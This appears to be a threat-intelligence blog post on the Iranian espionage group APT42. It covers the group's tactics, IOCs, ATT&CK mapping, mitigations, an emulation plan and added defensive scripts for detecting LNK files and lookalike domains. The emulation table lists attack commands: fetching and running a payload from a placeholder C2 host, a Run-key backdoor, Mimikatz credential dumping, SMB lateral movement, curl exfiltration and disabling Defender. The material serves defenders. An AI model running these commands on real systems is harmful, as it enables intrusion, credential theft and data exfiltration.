APT42: Operations, IOCs, Tactics, Detection Strategies
- Mar 9
Updated: Mar 28

Introduction
APT42, also known as "Charming Kitten," "Phosphorus," TA453, Mint Sandstorm, and Yellow Garuda, is an Iranian state-sponsored cyber espionage group assessed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. Active since at least 2015, APT42 has consistently targeted governments, NGOs, journalists, think tanks, academics, and individuals of strategic interest to Iran. As of 2024, the U.S. and Israel accounted for roughly 60% of the group's known geographic targeting, with continued campaigns against Israeli defense and diplomatic personnel and individuals affiliated with U.S. presidential campaigns.
In this blog, we explore APT42's tactics, techniques, and procedures (TTPs), provide updated indicators of compromise (IOCs), and share an emulation plan to help defenders detect and mitigate this persistent threat.
APT42's Modus Operandi
APT42 relies on highly targeted spear-phishing and prolonged social engineering to build trust before stealing credentials or deploying malware. Operations fall into three categories: credential harvesting (including MFA bypass), surveillance (Android malware, location and communications tracking), and selective use of Windows malware to support broader objectives.
Commonly Used Techniques
Spear-Phishing and Trust Building: APT42 conducts extended email conversations, impersonates journalists, researchers, and legitimate organizations (e.g., Institute for the Study of War, Brookings Institution, Washington Institute for Near East Policy), and uses benign PDFs or links before delivering malicious content. Fake podcast and webinar invitations have been used to deliver malware (e.g., July 2024 BlackSmith campaign).
Credential Theft and Phishing Kits: The group operates sophisticated credential-harvesting kits such as GCollection, LCollection, and YCollection (targeting Google, Hotmail, Yahoo), and the DWP browser-in-the-browser kit. They abuse Google Sites, Google Drive, Dropbox, OneDrive, and URL shorteners to host phishing pages and redirects. Typosquatted domains (e.g., understandingthewar[.]org, brookings[.]email) mimic legitimate organizations.
Multi-Stage Malware: Beyond credential theft, APT42 has deployed custom backdoors and loaders. In 2024, the group introduced the BlackSmith toolkit delivering AnvilEcho, a PowerShell implant that succeeds CharmPower and GorjolEcho, with capabilities for reconnaissance, screenshot capture, file exfiltration, and C2 communication. Delivery has included malicious ZIP archives containing Windows shortcut (LNK) files, often via Google Drive or DocSend-style links.
Exploitation of Trust: The group impersonates trusted entities and research institutions, sets up fake video-call lures (Google Meet, OneDrive, Dropbox, Skype), and uses legitimate-looking attachments to condition targets before sending phishing links via Signal, Telegram, or WhatsApp.
Mobile Targeting: APT42 continues to target Android devices with spyware that exploits Accessibility Services to monitor communications, track location, and surveil activists and persons of interest.
Recent Activity (2024)
Between February and late July 2024, APT42 intensified targeting of Israel and the U.S., including Israeli military and defense officials, diplomats, academics, NGOs, and individuals affiliated with U.S. presidential campaigns. Google TAG reported resetting compromised accounts, blocking malicious domains, and dismantling APT42-created Google Sites phishing pages.
In April 2024, the group used Google Sites pages masquerading as a petition from the Jewish Agency for Israel and targeted former Israeli military officials and diplomats with social engineering emails. In June, campaigns used benign PDFs with shortened URLs leading to credential-harvesting landing pages.
In July 2024, Proofpoint and others documented TA453/APT42 targeting a prominent religious figure with a fake podcast invitation impersonating the Institute for the Study of War. The campaign used the spoofed domain understandingthewar[.]org and delivered the BlackSmith malware toolkit (including the AnvilEcho PowerShell implant) via a Google Drive-hosted ZIP containing a malicious LNK.
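To hunt for the ZIP-with-LNK delivery chain described above (the same chain the EDR guidance under Mitigation Strategies asks defenders to detect), here is an added Python example, not code from the original post or from any vendor tool: it opens an archive, parses the ShellLink header of each .lnk entry, and flags command-line arguments that carry script-interpreter switches. The archive and shortcut it inspects are constructed inside the block, not real samples.

```python
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink class id, as stored on disk
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, IS_UNICODE = 1, 2, 4, 8, 16, 32, 128
SUSPICIOUS = ("powershell", "mshta", "wscript", "-nop", "-enc", "hidden", "iex", "downloadstring")

def lnk_arguments(data: bytes) -> str:
    """Return the COMMAND_LINE_ARGUMENTS string of a .lnk, or '' if absent or malformed."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        return ""
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                    # StringData follows the fixed 76-byte header ...
    if flags & HAS_IDLIST:                        # ... after an optional IDList (uint16 size + body)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                      # ... and an optional LinkInfo (uint32 size incl. itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for flag in (HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS):   # fixed StringData order
        if not flags & flag:
            continue
        if pos + 2 > len(data):                   # truncated file: treat as no arguments
            return ""
        count = struct.unpack_from("<H", data, pos)[0]
        raw = data[pos + 2: pos + 2 + count * width]
        if flag == HAS_ARGS:
            return raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
        pos += 2 + count * width
    return ""

def scan_zip(zip_bytes: bytes) -> list:
    """Return (entry name, arguments) for each .lnk whose command line looks like script execution."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                args = lnk_arguments(zf.read(info))
                if any(s in args.lower() for s in SUSPICIOUS):
                    hits.append((info.filename, args))
    return hits

def build_sample_zip() -> bytes:
    """Constructed fixture, not a real sample: a decoy PDF beside a minimal .lnk carrying PowerShell switches."""
    args = '-w hidden -nop -c "Start-Process decoy.pdf"'
    header = (b"\x4c\x00\x00\x00" + LNK_CLSID + struct.pack("<I", HAS_ARGS | IS_UNICODE)).ljust(0x4C, b"\x00")
    lnk = header + struct.pack("<H", len(args)) + args.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Podcast_Invitation.pdf", b"%PDF-1.4 decoy")
        zf.writestr("Podcast_Invitation.pdf.lnk", lnk)
    return buf.getvalue()
```

A double extension such as `.pdf.lnk` on an archive entry is itself worth an alert, independent of what the shortcut's arguments contain.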
Throughout 2024, Google TAG observed APT42 targeting personal email accounts of individuals affiliated with U.S. presidential campaigns and disrupting credential-phishing attempts. High-risk users were advised to enroll in Google's Advanced Protection Program.
Key Indicators of Compromise (IOCs)
The following IOCs are associated with APT42 campaigns as of 2024. Infrastructure and hashes rotate frequently; use current threat intelligence feeds and vendor reports for the latest indicators.
Domains and URLs (2024)
understandingthewar[.]org (impersonates Institute for the Study of War; BlackSmith campaign)
brookings[.]email (impersonates Brookings Institution)
panel-short-check[.]live (GCollection phishing kit)
check-pabnel-status[.]live (GCollection phishing kit)
accredit-navigation[.]online (DWP phishing kit)
Legacy and historically reported domains (may be defunct): acconut-signin[.]com, account-signin[.]com, secure-verify[.]net, mail-update[.]org, update-service[.]info, and similar typosquatted patterns.
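As an added example that is not part of the original post, the following Python check refangs domain IOCs written in the `[.]` form used above and flags lookalikes of the organisations APT42 impersonates. The legitimate domains in `PROTECTED` are assumptions made for illustration, not values taken from the post.

```python
from difflib import SequenceMatcher
from typing import Optional

# Assumed legitimate domains of organisations the post says APT42 impersonates (illustrative only).
PROTECTED = {
    "understandingwar.org": "Institute for the Study of War",
    "brookings.edu": "Brookings Institution",
    "washingtoninstitute.org": "Washington Institute for Near East Policy",
}

def refang(domain: str) -> str:
    """Turn a defanged IOC such as brookings[.]email back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".").rstrip(".")

def registrable_label(domain: str) -> str:
    """Second-level label: 'brookings' for mail.brookings.edu (single-level public suffixes assumed)."""
    parts = refang(domain).split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def lookalike_of(candidate: str, threshold: float = 0.8) -> Optional[str]:
    """Return the protected domain a candidate imitates, or None if it looks unrelated.

    Two signals: the brand label reused under another TLD (brookings[.]email), or a
    label within edit similarity of the brand (understandingthewar vs understandingwar).
    """
    cand = refang(candidate)
    if cand in PROTECTED or any(cand.endswith("." + legit) for legit in PROTECTED):
        return None                                   # the real site or one of its subdomains
    label = registrable_label(cand)
    for legit in PROTECTED:
        brand = registrable_label(legit)
        if brand in label or SequenceMatcher(None, label, brand).ratio() >= threshold:
            return legit
    return None

def triage(candidates) -> dict:
    """Map each suspicious candidate to the organisation it impersonates."""
    return {c: PROTECTED[hit] for c in candidates if (hit := lookalike_of(c))}
```

Kit-hosting names like panel-short-check[.]live carry no brand at all, so they pass this check and still need blocklisting from a current feed.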
IP Addresses
49.13.194[.]118 (C2 – OFFICEFUEL/FUELDUMP)
91.107.150[.]184 (C2 – OFFICEFUEL/FUELDUMP)
File Hashes (2024)
Tactics, Techniques, and Procedures (TTPs)
APT42 is tracked as MITRE ATT&CK group G1044; closely related activity is also documented under G0059 (Charming Kitten / Magic Hound / TA453). Recent 2024 activity has emphasized spear-phishing with malicious LNK and ZIP delivery (e.g., BlackSmith/AnvilEcho), abuse of cloud storage and URL shorteners, and credential-harvesting kits (GCollection, DWP) supporting MFA and recovery-code capture. Below is a breakdown of techniques mapped to the MITRE ATT&CK framework:
Category | MITRE ATT&CK ID | Description |
|---|---|---|
Initial Access | T1133 | External Remote Services |
Initial Access | T1566.001 | Spear-phishing Attachment |
Initial Access | T1566.002 | Spear-phishing Link |
Execution | T1047 | Windows Management Instrumentation |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript/Jscript |
Execution | T1569.002 | System Services: Service Execution |
Execution | T1204.001 | User Execution: Malicious Link |
Execution | T1204.002 | User Execution: Malicious File |
Persistence | T1098.002 | Account Manipulation: Exchange Email Delegate Permissions |
Persistence | T1133 | External Remote Services |
Persistence | T1543.003 | Create or Modify System Process: Windows Service |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Persistence | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL |
Privilege Escalation | T1055 | Process Injection |
Privilege Escalation | T1134 | Access Token Manipulation |
Privilege Escalation | T1543.003 | Create or Modify System Process: Windows Service |
Privilege Escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Privilege Escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL |
Defense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing |
Defense Evasion | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools |
Defense Evasion | T1055 | Process Injection |
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
Defense Evasion | T1112 | Modify Registry |
Defense Evasion | T1134 | Access Token Manipulation |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Defense Evasion | T1221 | Template Injection |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Defense Evasion | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Discovery | T1564.003 | Hide Artifacts: Hidden Window |
Discovery | T1012 | Query Registry |
Discovery | T1016 | System Network Configuration Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1087.001 | Account Discovery: Local Account |
Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Discovery | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Discovery | T1518 | Software Discovery |
Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol |
Lateral Movement | T1021.004 | Remote Services: SSH |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1111 | Two-Factor Authentication Interception |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |
Command and Control | T1095 | Non-Application Layer Protocol |
Command and Control | T1102 | Web Service |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1132 | Data Encoding: Standard Encoding |
Command and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptographic |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Impact | T1529 | System Shutdown/Reboot |
Collection | T1056.001 | Input Capture: Keylogging |
Collection | T1113 | Screen Capture |
Collection | T1115 | Clipboard Data |
Collection | T1123 | Audio Capture |
Collection | T1125 | Video Capture |
Collection | T1213 | Data from Information Repositories: Sharepoint |
Collection | T1560.002 | Archive Collected Data: Archive via Library |
Emulation Plan for APT42
Environment Setup
Component | Details |
|---|---|
Active Directory (AD) Domain | 2 Windows Servers + 3 Windows Clients |
Endpoints | 2 Linux (Ubuntu/Kali), 2 Windows 10/11 Machines |
SIEM/XDR | ELK Stack / Splunk / Microsoft Sentinel |
Network Monitoring | Suricata / Zeek (formerly Bro) |
Phishing Server | GoPhish for simulating attacks |
C2 Framework | Covenant / Cobalt Strike / Empire |
Mobile Device Setup | Android VM with APT42-based malware |
Emulation Plan
Tactic | Emulation Actions | Tools/Commands |
|---|---|---|
Reconnaissance | Perform OSINT and social media research to identify personal email addresses and security postures (e.g., MFA type). | theHarvester -d example.com -b google |
Initial Access | Spear-phish with fake webinar/podcast lures; host malicious LNK/ZIP on cloud storage (e.g., Google Drive). Use Evilginx2 or GCollection-style kits for MFA bypass. | GoPhish + malicious LNK in ZIP |
Execution | Deploy PowerShell implants (AnvilEcho-style): staged execution via LNK, script-based C2. Use LOLBins and mshta for execution. | IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1') |
Persistence | Registry Run keys, Windows services, Winlogon helper DLL. Android: AccessibilityService abuse for surveillance. | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Users\Public\backdoor.exe" |
Privilege Escalation | Token manipulation, credential dumping (Mimikatz), service abuse. | sekurlsa::logonpasswords |
Credential Access | OS credential dumping, keylogging, MFA/recovery-code interception via phishing kits. | Invoke-Mimikatz -DumpCreds |
Lateral Movement | RDP, SMB, SSH for lateral movement. | Invoke-SMBExec -Target victim-host -Credential $creds |
Exfiltration | Exfil over C2 channel; abuse cloud storage (Drive, OneDrive) and DNS tunneling. | curl -F "file=@data.zip" https://drive.google.com/upload |
Impact | Disable security tools; delete event logs. | net stop WinDefend |
Mitigation Strategies
To defend against APT42 and similar threats, implement the following:
User Training: Train staff on prolonged social engineering, fake podcast/webinar lures, and typosquatted domains. Encourage verification of sender identity and URLs before clicking or entering credentials.
Strong MFA and Account Hardening: Enforce phishing-resistant MFA where possible. High-risk users (e.g., government, campaigns, journalists, NGOs) should consider Google's Advanced Protection Program (APP) or equivalent to limit application passwords and reduce credential abuse.
Endpoint Detection and Response (EDR): Detect PowerShell execution, LNK/ZIP-based delivery, and LOLBin abuse. Hunt for AnvilEcho-style C2 and screenshot/exfil behaviors.
Network and Email Security: Block or alert on known APT42 domains and phishing kit URLs. Monitor for abuse of Google Drive, OneDrive, Dropbox, and URL shorteners in phishing flows.
Mobile Device Management (MDM): Enforce policies to limit sideloading and monitor for Android spyware abusing Accessibility Services.
Threat Intelligence: Subscribe to vendor reports (e.g., Google TAG, Mandiant, Proofpoint) and use current IOCs; APT42 infrastructure rotates frequently.
Conclusion
APT42 remains a persistent, state-sponsored threat with evolving tactics—including new malware (BlackSmith/AnvilEcho), abuse of trusted platforms, and focused targeting of Israel and U.S. political and defense figures. By understanding their TTPs, using updated IOCs, and emulating their behavior in controlled environments, defenders can improve detection and mitigation.
References
Google Cloud Blog – APT42: Crooked Charms, Cons, and Compromises: https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises/
Google Cloud Blog – Untangling Iran's APT42 Operations: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
Google TAG – Iranian backed group steps up phishing campaigns against Israel, U.S. (Aug 2024): https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us
Proofpoint – TA453 Targets Religious Figure with Fake Podcast Invite Delivering BlackSmith (Jul 2024): https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering
MITRE ATT&CK – APT42 (G1044): https://attack.mitre.org/groups/G1044/
MITRE ATT&CK – Charming Kitten / Magic Hound (G0059): https://attack.mitre.org/groups/G0059/